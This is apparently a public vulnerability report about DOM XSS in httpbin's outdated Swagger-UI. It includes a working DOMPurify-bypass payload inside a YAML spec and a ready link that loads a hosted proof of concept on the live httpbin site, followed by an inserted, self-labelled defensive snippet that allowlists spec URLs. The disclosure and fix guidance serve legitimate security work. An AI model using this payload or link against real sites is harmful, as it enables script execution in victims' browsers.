httpbin uses an old version of Swagger-UI under the hood which is vulnerable to DOM XSS when a malicious YAML file is passed as the value of the query parameter url.
Steps To Reproduce:
Host a malicious .yaml file with the payload inside:
```yaml
swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
```
Visit the link https://httpbin.org?url=https://jumpy-floor.surge.sh/test.yaml. Here I use the publicly available PoC posted in the reference article and the public instance of httpbin for ease. You can test it on another instance you spin up and use a payload you host if you prefer.
Upgrade Swagger-UI to the latest version, which mitigates this.
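Beside upgrading, the root cause of the report is that the page honours an arbitrary `url` query parameter and fetches whatever spec it names. The following is an added defensive example, not httpbin's or Swagger-UI's own code: it only passes a spec URL to Swagger-UI when it is an https URL on an allowlisted origin and otherwise falls back to a fixed default. `queryConfigEnabled` is a real Swagger-UI option; the allowlist and the default spec URL are constructed for this example.

```javascript
// Added example (not from the issue or from Swagger-UI): restrict which spec
// URLs the page will load instead of trusting the raw `url` query parameter.

// Constructed allowlist: the only origins a spec may be fetched from.
const SPEC_ORIGIN_ALLOWLIST = new Set(["https://httpbin.org"]);
// Constructed default spec, used whenever the request is rejected.
const DEFAULT_SPEC = "https://httpbin.org/spec.json";

/**
 * Decide which spec URL to hand to SwaggerUIBundle.
 * `search` is the page's location.search, e.g. "?url=https://example.invalid/x.yaml".
 * The requested URL is returned only if it is absolute, https, and on an allowed
 * origin; relative, malformed, http or foreign-origin values fall back to the default.
 */
function resolveSpecUrl(search, allowlist = SPEC_ORIGIN_ALLOWLIST, fallback = DEFAULT_SPEC) {
  const requested = new URLSearchParams(search).get("url");
  if (!requested) return fallback;
  let parsed;
  try {
    parsed = new URL(requested); // relative or malformed values throw here
  } catch {
    return fallback;
  }
  if (parsed.protocol !== "https:" || !allowlist.has(parsed.origin)) {
    return fallback;
  }
  return parsed.href;
}

/**
 * Build the Swagger-UI config. With queryConfigEnabled left false, the library
 * itself will not read `url` (or any other setting) from the query string, so the
 * allowlisted value above is the only path by which a spec URL reaches it.
 */
function buildSwaggerConfig(search) {
  return {
    url: resolveSpecUrl(search),
    dom_id: "#swagger-ui",
    queryConfigEnabled: false,
  };
}

// In the page: SwaggerUIBundle(buildSwaggerConfig(window.location.search));
```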
A few notes
I sent you an email regarding this and got no reply, so I am opening an issue here. Since there is another XSS reported 2 years ago or so and you haven't responded to that, I assume you don't care about XSS in general.
However, I decided to report this for 2 reasons:
It was already fixed by Swagger-UI and using the latest versions of dependencies is Security 101
I am a bug bounty hunter on hackerone.com. Most programs accept 0-day reports no earlier than 30 days after publication. I've come across some instances of this and I want to report them, and since I believe this is a 0-day I wanted to make it public for this reason.
Supporting Material/References:
This is a bug in older Swagger-UI versions that use an older version of DOMPurify to sanitize HTML. You can read more about it here: https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers
Impact
Run JavaScript in the victim's browser.
Best Regards,
rhinestonecowboy